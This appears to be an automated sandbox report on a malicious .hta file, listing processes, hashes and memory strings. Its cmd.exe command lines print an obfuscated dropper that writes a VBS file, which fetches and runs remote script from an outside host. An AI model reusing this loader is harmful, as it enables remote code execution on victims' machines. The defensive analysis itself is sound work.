                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 2e 78 63 3d 30 3b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 62 2c 65 3d 28 63 2d 62 29 25 36 2b 62 3b 65 3c 3d 63 3b 64 3d 65 2c 65 2b 3d 36 29 64 3d 4e 75 6d 62 65 72 28 61 2e 73 6c 69 63 65 28 64 2c 65 29 29 2c 5f 2e 79 63 2a 3d 31 45 36 2c 5f 2e 78 63 3d 5f 2e 78 63 2a 31 45 36 2b 64 2c 5f 2e 78 63 3e 3d 34 32 39 34 39 36 37 32 39 36 26 26 28 5f 2e 79 63 2b 3d 5f 2e 77 28 4d 61 74 68 2c 22 74 72 75 6e 63 22 29 2e 63 61 6c 6c 28 4d 61 74 68 2c 5f 2e 78 63 2f 34 32 39 34 39 36 37 32 39 36 29 2c 5f 2e 79 63 3e 3e 3e 3d 30 2c 5f 2e 78 63 3e 3e 3e 3d 30 29 3b 62 26 26 28 62 3d 5f 2e 79 28 41 63 28 5f 2e 78 63 2c 5f 2e 79 63 29 29 2c 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2c 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2c 5f
                                                                                                                                                                                                                                      Data Ascii: .xc=0;for(var c=a.length,d=b,e=(c-b)%6+b;e<=c;d=e,e+=6)d=Number(a.slice(d,e)),_.yc*=1E6,_.xc=_.xc*1E6+d,_.xc>=4294967296&&(_.yc+=_.w(Math,"trunc").call(Math,_.xc/4294967296),_.yc>>>=0,_.xc>>>=0);b&&(b=_.y(Ac(_.xc,_.yc)),a=b.next().value,b=b.next().value,_


                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                      Start time:04:40:15
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
                                                                                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                                                                                      File size:13'312 bytes
                                                                                                                                                                                                                                      MD5 hash:FE91714AF17067613A33BE57793819EE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                      Start time:04:41:22
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                                      Imagebase:0xee0000
                                                                                                                                                                                                                                      File size:245'760 bytes
                                                                                                                                                                                                                                      MD5 hash:7B2C2B671D3F48A01B334A0070DEC0BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                      Start time:04:41:22
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6038b0000
                                                                                                                                                                                                                                      File size:1'040'384 bytes
                                                                                                                                                                                                                                      MD5 hash:9698384842DA735D80D278A427A229AB
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                      Start time:04:41:22
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                                      Imagebase:0xee0000
                                                                                                                                                                                                                                      File size:245'760 bytes
                                                                                                                                                                                                                                      MD5 hash:7B2C2B671D3F48A01B334A0070DEC0BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                      Start time:04:41:23
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                                      Imagebase:0xee0000
                                                                                                                                                                                                                                      File size:245'760 bytes
                                                                                                                                                                                                                                      MD5 hash:7B2C2B671D3F48A01B334A0070DEC0BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                      Start time:04:41:23
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                                      Imagebase:0xee0000
                                                                                                                                                                                                                                      File size:245'760 bytes
                                                                                                                                                                                                                                      MD5 hash:7B2C2B671D3F48A01B334A0070DEC0BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                      Start time:04:41:23
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ff800000
                                                                                                                                                                                                                                      File size:245'760 bytes
                                                                                                                                                                                                                                      MD5 hash:7B2C2B671D3F48A01B334A0070DEC0BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                      Start time:04:41:23
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                                      Imagebase:0xee0000
                                                                                                                                                                                                                                      File size:245'760 bytes
                                                                                                                                                                                                                                      MD5 hash:7B2C2B671D3F48A01B334A0070DEC0BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                      Start time:04:41:23
                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                                                                                      File size:155'136 bytes
                                                                                                                                                                                                                                      MD5 hash:38001313D74BCC31CA3C7FC16B502F6A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Reset < >
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ea648b0e667ce07838","alt":"","children":[],"crmkey":"","flag":"false","highlight":"false","image":"","imageUrl":"","link":"https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depurador","metric_id":"674e18cfc5d819f6a95bb6bf-b691d265054a","metrics", xrefs: 0E9B9C22
                                                                                                                                                                                                                                        • PS:k, xrefs: 0E9B9C73
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: PS:k$ea648b0e667ce07838","alt":"","children":[],"crmkey":"","flag":"false","highlight":"false","image":"","imageUrl":"","link":"https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depurador","metric_id":"674e18cfc5d819f6a95bb6bf-b691d265054a","metrics"
                                                                                                                                                                                                                                        • API String ID: 0-2379658027
                                                                                                                                                                                                                                        • Opcode ID: 915394f9ff8e42d05eb57173061137d96822db545ddba86ee3b0b65c75ff32ee
                                                                                                                                                                                                                                        • Instruction ID: 28bac7d66ec841e11d4c220d43aadc4a56adcc123d462ec1576b0bb003a516ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 915394f9ff8e42d05eb57173061137d96822db545ddba86ee3b0b65c75ff32ee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32310479324204AFE714CF59CA82BD5BBD8EFC6720F544558FA2A9B391D370EC00CAA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9BA000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: PS:k
                                                                                                                                                                                                                                        • API String ID: 0-2071602942
                                                                                                                                                                                                                                        • Opcode ID: 25011877bfd26353a6acdcee14a94cd0cbea779ac57ddd09d14035125230e117
                                                                                                                                                                                                                                        • Instruction ID: fadb8b64500d1cbcfcac667e614d8fd71ea9ad1f4c964ebc8c00ba9614d50828
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25011877bfd26353a6acdcee14a94cd0cbea779ac57ddd09d14035125230e117
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D522571A05304AFEB14CF94CA91AEDBBB9FF49700F148949E556AB384EB74AC41CF60
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: PS:k
                                                                                                                                                                                                                                        • API String ID: 0-2071602942
                                                                                                                                                                                                                                        • Opcode ID: 2223a930beff99822301aaad9750dc5ee835e5d5b5a591981fa8076a4378fd53
                                                                                                                                                                                                                                        • Instruction ID: fadb8b64500d1cbcfcac667e614d8fd71ea9ad1f4c964ebc8c00ba9614d50828
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2223a930beff99822301aaad9750dc5ee835e5d5b5a591981fa8076a4378fd53
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D522571A05304AFEB14CF94CA91AEDBBB9FF49700F148949E556AB384EB74AC41CF60
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474775734.000000000E9B3000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: b_
                                                                                                                                                                                                                                        • API String ID: 0-3989198783
                                                                                                                                                                                                                                        • Opcode ID: 47273a23ee668f7f56744038cb837590ba892c2ff800e803728fe9b060165a5a
                                                                                                                                                                                                                                        • Instruction ID: 8b709435a93d8d04fbbc921bd222c46b02dce90ea988cc03ca9ab1154a283017
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47273a23ee668f7f56744038cb837590ba892c2ff800e803728fe9b060165a5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF425671A04324EFEB24CF658A52BEA7BA8EF84710F05495DD806AB385CBF59C41CF91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474775734.000000000E9B3000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B3000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: b_
                                                                                                                                                                                                                                        • API String ID: 0-3989198783
                                                                                                                                                                                                                                        • Opcode ID: a9ecc6cdc5f211c121e20670754b14be5056d46bd32164bb9f8cccba882b1324
                                                                                                                                                                                                                                        • Instruction ID: 8b709435a93d8d04fbbc921bd222c46b02dce90ea988cc03ca9ab1154a283017
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9ecc6cdc5f211c121e20670754b14be5056d46bd32164bb9f8cccba882b1324
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF425671A04324EFEB24CF658A52BEA7BA8EF84710F05495DD806AB385CBF59C41CF91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ,"id":"contentmiddle5","type":"publish"},"Area:home_page.rr2":{"__typename":"Area","id":"home_page.rr2","type":"recommendation"},"Area:home_page.ads":{"__typename":"Area","id":"home_page.ads","type":"recommendation"},"Area:home_page.rr3":{"__typename":"Area",", xrefs: 0E9B281F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474828414.000000000E9B2000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,"id":"contentmiddle5","type":"publish"},"Area:home_page.rr2":{"__typename":"Area","id":"home_page.rr2","type":"recommendation"},"Area:home_page.ads":{"__typename":"Area","id":"home_page.ads","type":"recommendation"},"Area:home_page.rr3":{"__typename":"Area","
                                                                                                                                                                                                                                        • API String ID: 0-1645480348
                                                                                                                                                                                                                                        • Opcode ID: e0e5d459cfc102de7c80f78981aec64723a561f5458e48e04879fa0d5540d756
                                                                                                                                                                                                                                        • Instruction ID: 6be60e737c1c7a4283b42418639b4d4d953c90a6b0fed1e7c77e0baae1631923
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0e5d459cfc102de7c80f78981aec64723a561f5458e48e04879fa0d5540d756
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7513771344204AFE724CF45CA91FBABBA5EB85B10F14889DE91B9B2E5CB70DC11CB91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ,"id":"contentmiddle5","type":"publish"},"Area:home_page.rr2":{"__typename":"Area","id":"home_page.rr2","type":"recommendation"},"Area:home_page.ads":{"__typename":"Area","id":"home_page.ads","type":"recommendation"},"Area:home_page.rr3":{"__typename":"Area",", xrefs: 0E9B281F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474828414.000000000E9B2000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B2000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,"id":"contentmiddle5","type":"publish"},"Area:home_page.rr2":{"__typename":"Area","id":"home_page.rr2","type":"recommendation"},"Area:home_page.ads":{"__typename":"Area","id":"home_page.ads","type":"recommendation"},"Area:home_page.rr3":{"__typename":"Area","
                                                                                                                                                                                                                                        • API String ID: 0-1645480348
                                                                                                                                                                                                                                        • Opcode ID: faa82edb7c0aa2716e260c6401b494b65bdb47cbe30a2ea90d5963db10f56632
                                                                                                                                                                                                                                        • Instruction ID: 6be60e737c1c7a4283b42418639b4d4d953c90a6b0fed1e7c77e0baae1631923
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faa82edb7c0aa2716e260c6401b494b65bdb47cbe30a2ea90d5963db10f56632
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7513771344204AFE724CF45CA91FBABBA5EB85B10F14889DE91B9B2E5CB70DC11CB91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: s
                                                                                                                                                                                                                                        • API String ID: 0-2124748802
                                                                                                                                                                                                                                        • Opcode ID: 8d0578996603d787d767d654556ecbd6ab6d07e0cc948944a8dedc70af98cce8
                                                                                                                                                                                                                                        • Instruction ID: a65290de4e33e50241d2ec583c51b2b08eec8672b339c0a29dd42d235c4ac908
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d0578996603d787d767d654556ecbd6ab6d07e0cc948944a8dedc70af98cce8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF318BB0A05205EFDB20CF19CA44BA9FBF1BF49314F148A59E4699B380C771AD01CF91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9BC000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: s
                                                                                                                                                                                                                                        • API String ID: 0-2124748802
                                                                                                                                                                                                                                        • Opcode ID: 8d0578996603d787d767d654556ecbd6ab6d07e0cc948944a8dedc70af98cce8
                                                                                                                                                                                                                                        • Instruction ID: a65290de4e33e50241d2ec583c51b2b08eec8672b339c0a29dd42d235c4ac908
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d0578996603d787d767d654556ecbd6ab6d07e0cc948944a8dedc70af98cce8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF318BB0A05205EFDB20CF19CA44BA9FBF1BF49314F148A59E4699B380C771AD01CF91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9BA000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a95131399e1f2431fd2cc585d201c15c6d1efb0170ae3fafbe4818fdef56b573
                                                                                                                                                                                                                                        • Instruction ID: a50f5c3dbbddd53a99b64633dcf55f7cc0d8c16f142feb5b1cd99cc67c1ef246
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a95131399e1f2431fd2cc585d201c15c6d1efb0170ae3fafbe4818fdef56b573
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6051AF31B042148BEB14CF48CA91AEDBBE5EF88350F148859E99A9B395E771DC46CF81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9458ea32df8526407ef0a8cc3a769279efc8a310a5e2a912f1a15c04101ad6e3
                                                                                                                                                                                                                                        • Instruction ID: a50f5c3dbbddd53a99b64633dcf55f7cc0d8c16f142feb5b1cd99cc67c1ef246
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9458ea32df8526407ef0a8cc3a769279efc8a310a5e2a912f1a15c04101ad6e3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6051AF31B042148BEB14CF48CA91AEDBBE5EF88350F148859E99A9B395E771DC46CF81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9BA000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7d3d656d2822561a3d9e491d87d65326f7b498bb9c7af4e1547156e0f6338144
                                                                                                                                                                                                                                        • Instruction ID: 2f595052c8dd873a12511786e38ca3472ba92291cf1d6feef5c60728627fce33
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d3d656d2822561a3d9e491d87d65326f7b498bb9c7af4e1547156e0f6338144
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC51C4317042148FEB14CF48CA95AEDB7E5EF88350F148859E99A9B395E771DC42CF81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: db5cc2380d03292828b89fdd70be6853133b028f88def601155f21d457e74d05
                                                                                                                                                                                                                                        • Instruction ID: 2f595052c8dd873a12511786e38ca3472ba92291cf1d6feef5c60728627fce33
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db5cc2380d03292828b89fdd70be6853133b028f88def601155f21d457e74d05
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC51C4317042148FEB14CF48CA95AEDB7E5EF88350F148859E99A9B395E771DC42CF81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9BA000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 05cee654e1546a715a03593c54c0a35887006d1c627e07553d5b58dbbe616fc7
                                                                                                                                                                                                                                        • Instruction ID: d9c8cd45592909cc6c69088c81154939b07f295e1378118decc0ca3aaede516a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05cee654e1546a715a03593c54c0a35887006d1c627e07553d5b58dbbe616fc7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB51B5317042148FEB14CF48CA91AEDBBE5EF88354F148859E9969B392E771DC46CF81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
